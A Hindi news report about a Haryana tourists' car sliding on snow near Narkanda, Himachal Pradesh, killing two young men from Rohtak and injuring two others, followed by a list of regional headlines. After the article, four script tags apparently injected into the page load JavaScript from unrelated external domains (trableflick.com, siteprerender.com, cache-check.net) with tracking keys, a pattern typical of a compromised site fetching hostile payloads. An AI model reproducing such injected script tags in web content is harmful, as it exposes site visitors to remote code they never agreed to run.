<p>हरियाणा के पर्यटकों की गाड़ी नारकंडा के पास बर्फ पर फिसलने के कारण दुर्घटनाग्रस्त हो गई। कार में 4 लोग सवार थे। इनमें से दो की मौके पर ही मौत हो गई है जबकि अन्य घायल हैं। ये दुर्घटना मंगलवार देर शाम नारकंडा के साथ स्थित हटू माता के मंदिर के रास्ते में हुई। सूचना मिलते ही पुलिस की टीम मौके पर पहुंची और सर्च ऑपरेशन शुरू किया। इस दौरान उन्होंने घटनास्थल से दो पर्यटकों के शव बरामद किए गए हैं। वहीं दो घायलों को कुमारसेन अस्पताल शिफ्ट कर दिया गया है।</p>
<p>हादसे में आशीष (25) पुत्र राम लाल और नवीन (28) पुत्र विजेंदर की मौत हुई है। ये दोनों रोहतक के रुड़की गांव के रहने वाले थे। घायलों में इसी गांव का पवन और यूपी के शामली जिला का अदील मलिक शामिल है। कुमारसेन पुलिस ने दुर्घटना को लेकर मामला दर्ज कर लिया है और जांच की जा रही है।</p>
<p>डीएसपी कुमारसेन चंद्रशेखर ने बुधवार को बताया कि कार में चार लोग सवार थे। हादसे में दो युवकों की मौके पर मौत हो गई। घायलों को कुमारसेन अस्पताल में भर्ती किया गया है और इनकी हालत में सुधार है। उन्होंने कहा कि शवों का पोस्टमार्टम करवाया जा रहा है। मृतकों के परिजनों को सूचित कर दिया गया है।</p>
<p><img src=”/media/gallery/images/image(8169).jpeg” style=”height:90px; width:743px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1609921820071″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Indo-China border security concerns: हिमाचल प्रदेश के किन्नौर जिले में इंडो-चाइना बॉर्डर पर चीन…
Wazir Ram Singh Pathania: कांगड़ा जिले के नूरपुर उपमंडल में शनिवार को राज्यपाल ने…
रैत में अंडर-19 राज्य स्तरीय खेलकूद प्रतियोगिता का समापन: शिक्षा मंत्री ने विजेताओं को किया…
Political Tension Escalates: हिमाचल प्रदेश में कांग्रेस और भाजपा के बीच आरोप-प्रत्यारोप का सिलसिला…
Shimla: मुख्यमंत्री सुखविंदर सिंह सुक्खू ने आज IGMC शिमला में टर्शरी कैंसर केयर सेंटर का…
एमएमयू इकाई 2 बंजार के द्वारा राजकीय वरिष्ठ माध्यमिक पाठशाला कनौन में किशोरियों को सामाजिक…